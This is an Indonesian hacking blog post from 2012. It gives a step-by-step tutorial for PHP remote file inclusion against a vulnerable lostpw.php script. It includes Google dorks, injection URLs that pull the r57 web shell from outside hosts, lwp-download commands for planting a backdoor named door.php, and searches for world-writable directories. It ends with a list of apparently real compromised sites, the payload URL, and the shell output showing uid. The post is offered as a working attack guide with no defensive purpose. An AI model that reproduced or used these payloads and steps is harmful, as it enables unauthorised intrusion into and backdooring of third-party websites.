PawankCrew Version

Free Download Software Full Version

ads

Responsive Advertisement
LATEST UPDATES

Thursday, February 2, 2012

Tutorial PHP Injection

Author PawankCrew Version on Thursday, February 02, 2012 in - Comments : 0

Selamat Malam Para Netter Semua Kali ini Team Kreatif PawankCrew akan Share tentang Tutorial PHP Injection baiklah mari kita langsung menuju ke TKP aja. mungkin tutorial ini rada basi sih.. cma /me cma mo share azah!
anak2 demohacking pasti da pada tau..

PHP injection...

pertama2 kita buka google.com

kita memasuk kan keyword nya di sana...

keyword nya yg di maksudkan di sini adalah dork,.. [bisa di lihat di
millw0rm.com cari sendiri yg laen]

Kita mulai saja!

sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=
allinurl%3Aindex.php%3Fa%3Ddisplay



allinurl:index.php?a=display

allinurl <=- mencari setiap kata pada url...

index.php?a=display

sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=

http://www.historywebsites.com//index.php?a=display <=- tampil pada
google..

http://www.historywebsites.com// <=- victim domain

index.php?a=display <=- DORK... kata kunci pada google...

http://www.historywebsites.com/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=


wwww.[domain].com/[path]/[file]?[BUGS]=[injector]?


injektor nya ada di link..


Quote:
http://www.geocities.com/yogya_hack/becak.tar.gz


Quote:
http://evilarmy.hostcentric.com/becak.tar.gz


itu adalah r57

hmm....
kalau sudah masuk ke web nya.. jangan lupa pasang backdoor...
cara nya ..

lwp-download http://www.geocities.com/yogya_hack/becak.tar.gz;ls -lia

jgn lupa... letak kan file nya di direktory yg permission drwxrwxrwx

find . -type d -perm 777

cari dari direktori skr sebuah direktori lain yang bisa di tlis...


find . -type f -perm 777 <=- mencari file

find / -type d -perm 777 <=- mencari dari direktori / (root)

Quote:
Backdoor PHP

1. lwp-download http://www.geocities.com/yogya_hack/becak.tar.gz
2. mv becak.tar.gz door.php

Contoh Hasil Site backdoor:

http://www.target.com/[path]/door.php



okeh...
sekian dl..
sector clear!!

Thanks Goes To:
ZeTH a.k.a s3t4n [Big thanks for finding the bugs!]
^MoNgOnDoW^ [Big thanks for lending the room!]
YF Xcode Big Famz! [thanks for support!]
^F_C^ [you know me!]
and all crewz!
#Becak & B-H-T crewz Vaksin13 OoN_BoY [makes me smile all the time!]


ini ada beberapa contoh shell nya...
semoga masih berjalan!


Quote:

http://www.historywebsites.com/topsites/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=48(apache) gid=48(apache) groups=48(apache),
2522(psaserv)

http://www.steroidsource.net/sources/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=32211(wantflir) gid=32211(wantflir)
groups=32211(wantflir)

http://dreamweaver.net.ru/ex/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz?

http://www.trsaga.com/top/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=99(nobody) gid=99(nobody) groups=99(nobody)

http://www.clubbangaz.net/tpl/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? user=banga uid=1476 gid=812

http://www.gameserverlist.de/toplist/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? user=web5 uid=670 gid=104

http://www.r.kmdn.ru/sources/lostpw.php?FORM[set]=1&FORM[session_id]
=1&CONFIG[path]=http://www.evilarmy.hostcentric.com/becak.tar.gz?
user=kmdn-r uid=2422 gid=1754

http://www.bullterrier.kiev.ua/topsites/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=99(nobody) gid=99(nobody) groups=99(nobody)

http://www.gurbetporthosting.com/GurbetPortList/sources/lostpw.php?
FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.
hostcentric.com/becak.tar.gz? user= uid= gid=643 save

http://a-z.az/top/sources/lostpw.php?FORM[set]=1&FORM[session_id]
=1&CONFIG[path]=http://www.evilarmy.hostcentric.com/becak.tar.gz?
user=a3544_1 uid=10130 gid=2524

http://vietcong.ath.cx/xampp/www/ucu/bannerlist//sources/lostpw.php?
FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.
hostcentric.com/becak.tar.gz? SYSTEM win

http://www.cityofgod.org/top/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=99(nobody) gid=99(nobody) groups=99(nobody),
511(restricted)

http://top.mavit.kiev.ua/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz?


Semoga Bermanfaat



Mohon Komentar di form dibawah ini, karena komentar anda sangat bermanfaat untuk kemajuan blog saya
Jika ada Pertanyaan atau kritik dan saran : dapat dikirim ke E-mail/Fb : alex_jombang@yahoo.com or sms ke : 087754283779

Post a Comment

Berani Baca Post, Harus berani juga untuk komentar
Budayakan berkomentar, dan jadikanlah Blogger Indonesia Sebagai contoh blogger yang baik :)

Subscribe to: Post Comments ( Atom )
 
Created By SoraTemplates | Distributed By Gooyaabi Templates

Top